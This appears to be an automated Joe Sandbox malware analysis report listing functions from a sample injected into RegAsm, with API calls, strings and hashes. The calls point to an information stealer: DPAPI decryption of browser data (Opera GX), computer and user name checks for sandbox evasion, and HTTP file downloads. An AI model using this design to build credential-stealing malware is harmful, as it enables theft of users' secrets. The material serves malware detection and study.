delayed %dms for lock/sharing conflict at line %d, xrefs: 19C2FE78

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID: FileRead
String ID: delayed %dms for lock/sharing conflict at line %d$winRead
API String ID: 2738559852-1843600136
Opcode ID: a7eb01e9ee19e71ad0dfbcb061aab29f10f16a921c5e6c929b4fe35d59d9b836
Instruction ID: e9a5fa44ed098f66977ecfee5bebeb9fe632da2619b4b215f5032486370200f8
Opcode Fuzzy Hash: a7eb01e9ee19e71ad0dfbcb061aab29f10f16a921c5e6c929b4fe35d59d9b836
Instruction Fuzzy Hash: CF412672A0434A6BD300DF64ED819ABB7A8FF84650FCC192DF585C7640E731F9588BA2

Uniqueness

Uniqueness Score: -1.00%

Function 0040CF50 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 107COMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00406E40: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000002,?,0040CABD,?,00000000,?,00000000,00000000), ref: 00406E77
Part of subcall function 00406E40: GetFileSizeEx.KERNEL32(00000000,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406E8D
Part of subcall function 00406E40: LocalAlloc.KERNEL32(00000040,?,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EA8
Part of subcall function 00406E40: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EC1
Part of subcall function 00406E40: CloseHandle.KERNEL32(00000000,?,0040CABD,?,00000000,?,00000000,00000000,?), ref: 00406EE9

Part of subcall function 00411750: LocalAlloc.KERNEL32(00000040,?,00000000,00000001,00000004,?,00413F63,00000000,00000000), ref: 0041176C

StrStrA.SHLWAPI(00000000,01531DE8,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CFBB

Part of subcall function 00406F10: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,0040648B,00000000,00000000), ref: 00406F37
Part of subcall function 00406F10: LocalAlloc.KERNEL32(00000040,00000000,?,0040648B,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406F46
Part of subcall function 00406F10: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,0040648B,00000000,00000000), ref: 00406F5D
Part of subcall function 00406F10: LocalFree.KERNEL32(?,?,0040648B,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406F6C

memcmp.MSVCRT ref: 0040CFF9

Part of subcall function 00406F90: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00406FB5
Part of subcall function 00406F90: LocalAlloc.KERNEL32(00000040,?,?), ref: 00406FCD
Part of subcall function 00406F90: LocalFree.KERNEL32(?), ref: 00406FEE

Strings

DPAPI, xrefs: 0040CFF3
, xrefs: 0040D024

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmp
String ID: $DPAPI
API String ID: 512175977-1819349886
Opcode ID: 228dde18d6380654e1e01747a0d40dda2febb3b458d53894edb870cd61412a9d
Instruction ID: 04e0419f88c9d5c658d70bb4a20b994614d1a13e8e8d8d930ac63f7b7d88e2a3
Opcode Fuzzy Hash: 228dde18d6380654e1e01747a0d40dda2febb3b458d53894edb870cd61412a9d
Instruction Fuzzy Hash: 3E3193B1D001099BCB10DF95DC42FEFB779AB84318F14422AE915B32C2EA395A49C6E5

Uniqueness

Uniqueness Score: -1.00%

Function 00410530 Relevance: 6.0, APIs: 4, Instructions: 39memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410545
HeapAlloc.KERNEL32(00000000), ref: 0041054C
RegOpenKeyExA.KERNEL32(80000002,0152B6B0,00000000,00020119,00000000), ref: 0041056B
RegQueryValueExA.KERNEL32(00000000,015319E0,00000000,00000000,00000000,000000FF), ref: 00410586

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID:
API String ID: 3676486918-0
Opcode ID: ebbb83980b96e7640f25af26754c2ff0e91fd82364fa7b8dbd91e5869d307b29
Instruction ID: 6759878f835c56c9ca0f427d276befcc344c5531ee7d20c41334848b2fd0dccc
Opcode Fuzzy Hash: ebbb83980b96e7640f25af26754c2ff0e91fd82364fa7b8dbd91e5869d307b29
Instruction Fuzzy Hash: 0CF04FB9640209BFD714DBA0DC59FAB7BBEEB45B41F105159BA0597250D6709900CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 0040E510 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 488COMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

StrCmpCA.SHLWAPI(00000000,Opera GX,00427AE6,00427AE3,?,?), ref: 0040E56D

Part of subcall function 004116F0: SHGetFolderPathA.SHELL32(00000000,?{B,00000000,00000000,?,?,00000000), ref: 00411728

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01522DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 00411690: GetFileAttributesA.KERNEL32(00000000,00000000,00000000,00421FB8,000000FF,?,0040E94A,?,00000000,00000000,00000000), ref: 004116B7

Part of subcall function 0040CF50: StrStrA.SHLWAPI(00000000,01531DE8,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040CFBB
Part of subcall function 0040CF50: memcmp.MSVCRT ref: 0040CFF9

Strings

Opera GX, xrefs: 0040E556
$, xrefs: 0040EB1E

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlenmemcmp
String ID: $$Opera GX
API String ID: 1439182418-3699434461
Opcode ID: 1749706aa2db81fa6de757973773e7b7360e6dd657e733d53bc66fe27f04b27c
Instruction ID: 17207a86614afdb77cff5a3d56c68c7749fc063a50330c9fb849252114e4ac69
Opcode Fuzzy Hash: 1749706aa2db81fa6de757973773e7b7360e6dd657e733d53bc66fe27f04b27c
Instruction Fuzzy Hash: 99128F71911248EACB14EBE5C945BEDBBB8AF19304F14817EF90573286DB781B0CC7A6

Uniqueness

Uniqueness Score: -1.00%

Function 004140D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 105stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000), ref: 00414100
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004141CF

Strings

ERROR, xrefs: 004141C9

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: ERROR
API String ID: 1659193697-2861137601
Opcode ID: df3b25b72e81ea361da62db3694fc4a8dabbd1a4e0db10303024cbd4f1e4006f
Instruction ID: 7a4a8b2ae2701fe1ed20729628e627548499ab356697860d70efb29cd96e5671
Opcode Fuzzy Hash: df3b25b72e81ea361da62db3694fc4a8dabbd1a4e0db10303024cbd4f1e4006f
Instruction Fuzzy Hash: 8341B6B1900244FFCB00EFA9D846BDE7BB4AB19354F10812EF505A7281DB389648CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00413D40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 00405A30: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405AA8
Part of subcall function 00405A30: StrCmpCA.SHLWAPI(?,0152F518,?,?,?,?,?,?,00000004), ref: 00405AC0
Part of subcall function 00405A30: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405AE4
Part of subcall function 00405A30: HttpOpenRequestA.WININET(00000000,GET,?,01532148,00000000,00000000,-00400100,00000000), ref: 00405B1B
Part of subcall function 00405A30: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405B3F

StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0042248F), ref: 00413DB5

Strings

ERROR, xrefs: 00413DA3
ERROR, xrefs: 00413E0E

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$Open$ConnectHttpOptionRequestlstrcpy
String ID: ERROR$ERROR
API String ID: 1815705353-2579291623
Opcode ID: 60aaeff547289181ae8f8bb4519d178c4f6478f03eee4e5f3c1696f8079ee93f
Instruction ID: 2de14b8495628cd286d50378bf444954eaaf3636dd8b2d3ca14243e0d5a7f802
Opcode Fuzzy Hash: 60aaeff547289181ae8f8bb4519d178c4f6478f03eee4e5f3c1696f8079ee93f
Instruction Fuzzy Hash: 99414F30914289DADB10EBA5C5057DDBBE8AF19308F5041AEF905636C2DFB81B08C7F6

Uniqueness

Uniqueness Score: -1.00%

Function 00411A40 Relevance: 4.5, APIs: 3, Instructions: 31COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00411A5C
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411A77
CloseHandle.KERNEL32(00000000), ref: 00411A7E

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 4989c77146abbc5ee76c948889740fc30d2da5c3921abf62d6455a5f4ed49132
Instruction ID: 660ba3e5b87f2d6f46484b434598976fca83c63f4e6e6eb2b951d01fded5b4af
Opcode Fuzzy Hash: 4989c77146abbc5ee76c948889740fc30d2da5c3921abf62d6455a5f4ed49132
Instruction Fuzzy Hash: AAF0273560112867D720AB44CC05FDE77689F05700F000194FF48AB2D0DBB05EC487D4

Uniqueness

Uniqueness Score: -1.00%

Function 004102C0 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0040105B,01522EC0,0041887F), ref: 004102CC
HeapAlloc.KERNEL32(00000000,?,?,?,0040105B,01522EC0,0041887F), ref: 004102D3
GetComputerNameA.KERNEL32(00000000,0041887F), ref: 004102E7

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: 00f558dfb3a4b80afd8e40931e88319d94c69cb643d845e7bfdafbd5d6e961f5
Instruction ID: 406b522a559848795045bf452203491930279dbdd2025bb65e998ac759834946
Opcode Fuzzy Hash: 00f558dfb3a4b80afd8e40931e88319d94c69cb643d845e7bfdafbd5d6e961f5
Instruction Fuzzy Hash: 68E08CB5741229ABD3109BE9AC0DBDBBAEDDB06B51F501196BB04D3240EAF08D0087E8

Uniqueness

Uniqueness Score: -1.00%

Function 00401050 Relevance: 4.5, APIs: 3, Instructions: 19stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004102C0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0040105B,01522EC0,0041887F), ref: 004102CC
Part of subcall function 004102C0: HeapAlloc.KERNEL32(00000000,?,?,?,0040105B,01522EC0,0041887F), ref: 004102D3
Part of subcall function 004102C0: GetComputerNameA.KERNEL32(00000000,0041887F), ref: 004102E7

strcmp.MSVCRT ref: 0040105C

Part of subcall function 00410280: GetProcessHeap.KERNEL32(00000000,00000104,?,01522DE0,?,00401074,01522DE0,?,0041887F), ref: 0041028C
Part of subcall function 00410280: HeapAlloc.KERNEL32(00000000,?,01522DE0,?,00401074,01522DE0,?,0041887F), ref: 00410293
Part of subcall function 00410280: GetUserNameA.ADVAPI32(00000000,01522DE0), ref: 004102A7

strcmp.MSVCRT ref: 00401075
ExitProcess.KERNEL32 ref: 00401082

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocNamestrcmp$ComputerExitUser
String ID:
API String ID: 2098570390-0
Opcode ID: 62a4c53fcb9bf593e476f24c714467af4436e90a2949d6c67d663f3053a85b1f
Instruction ID: 0e87048c4c810025046b2ff71762e49e4161a917b2b12ba1ada2c112072a28c4
Opcode Fuzzy Hash: 62a4c53fcb9bf593e476f24c714467af4436e90a2949d6c67d663f3053a85b1f
Instruction Fuzzy Hash: 5ED05BB1D0020256CF1077725D59A57229D9E11316740052FF840D7151F53DDCC4C27D

Uniqueness

Uniqueness Score: -1.00%

Function 00412A70 Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 728COMMON

Download Yara Rule

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01522DE0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

CreateDirectoryA.KERNEL32(00000000,00000000,00000000,?,01531CC8,?,00428574,?,?,00000000,01531F20,00000000,?,01531C00,?,00428570), ref: 004131EA

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 00405850: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004058B5

Part of subcall function 00405850: StrCmpCA.SHLWAPI(?,0152F518,?,?,?,?,?,?,0000000D), ref: 004058ED
Part of subcall function 00405850: InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,-00800100,00000000), ref: 00405912
Part of subcall function 00405850: CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,?,?,0000000D), ref: 00405935
Part of subcall function 00405850: InternetReadFile.WININET(00000000,?,00000400,000000FF), ref: 0040594E
Part of subcall function 00405850: WriteFile.KERNEL32(00000000,?,000000FF,004203D8,00000000,?,?,?,?,?,?,0000000D), ref: 0040596E
Part of subcall function 00405850: InternetReadFile.WININET(00000000,?,00000400,000000FF), ref: 00405998
Part of subcall function 00405850: CloseHandle.KERNEL32(00000000,?,00000400,?,?,?,?,?,?,0000000D), ref: 004059B4
Part of subcall function 00405850: InternetCloseHandle.WININET(00000000), ref: 004059BB
Part of subcall function 00405850: InternetCloseHandle.WININET(00000000), ref: 004059C2

Strings

F, xrefs: 00413482

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$File$CloseHandle$CreateOpenReadlstrcat$DirectoryWritelstrlen
String ID: F
API String ID: 3336520604-1304234792
Opcode ID: 64933d0dfc4c3c513359294a403d82db5c53117708ef4ed9c4664b0891a92b25
Instruction ID: c04eb2c2e67ebdd07284bf2178d9f41eb0a15058c49e10529a03e517fbc21d46
Opcode Fuzzy Hash: 64933d0dfc4c3c513359294a403d82db5c53117708ef4ed9c4664b0891a92b25
Instruction Fuzzy Hash: F6626D70805288EACB15E7E5C951BDDBBB85F19308F1480AEE54573282DF781B4CCBBA

Uniqueness

Uniqueness Score: -1.00%

Function 004069E0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,00000040,6k@,?,?,?,?,00406B36), ref: 00406A55

Strings

6k@, xrefs: 00406A3F, 00406A42

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID: 6k@
API String ID: 544645111-796046284
Opcode ID: 3cd70f51d592b6cc45cf5fa41d2a0a34811b31e58a1e5b5358e74f1d35610851
Instruction ID: 3aa464cb03e6a5daef80767049aabb5e2f81a0e8360af49d45380e9ae7790c68
Opcode Fuzzy Hash: 3cd70f51d592b6cc45cf5fa41d2a0a34811b31e58a1e5b5358e74f1d35610851
Instruction Fuzzy Hash: D211C6717141149FD724EF5CD8807A5F3D5FB0A300F51853AF94AE7280D639AC619B99

Uniqueness

Uniqueness Score: -1.00%

Function 004116F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?{B,00000000,00000000,?,?,00000000), ref: 00411728

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Strings

?{B, xrefs: 00411717, 00411725

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID: ?{B
API String ID: 1699248803-2221931326
Opcode ID: e79796351f89c84eeedae8a54d9f090e4875ca2003630773c6d08024e9c7cace
Instruction ID: a4db74e52ac5736c466cc754061609f1f71d2f4092c2171fd08521da563084ac
Opcode Fuzzy Hash: e79796351f89c84eeedae8a54d9f090e4875ca2003630773c6d08024e9c7cace
Instruction Fuzzy Hash: F7F08231A1015CABDB10DB58DC51B9EB7FDDB44715F1042A6B908A32C0D6706F0A8B94

Uniqueness

Uniqueness Score: -1.00%

Function 00411690 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,00000000,00000000,00421FB8,000000FF,?,0040E94A,?,00000000,00000000,00000000), ref: 004116B7

Strings

J@, xrefs: 004116AB, 004116CB

Memory Dump Source

Source File: 00000002.00000002.2055543025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2055543025.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2055543025.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
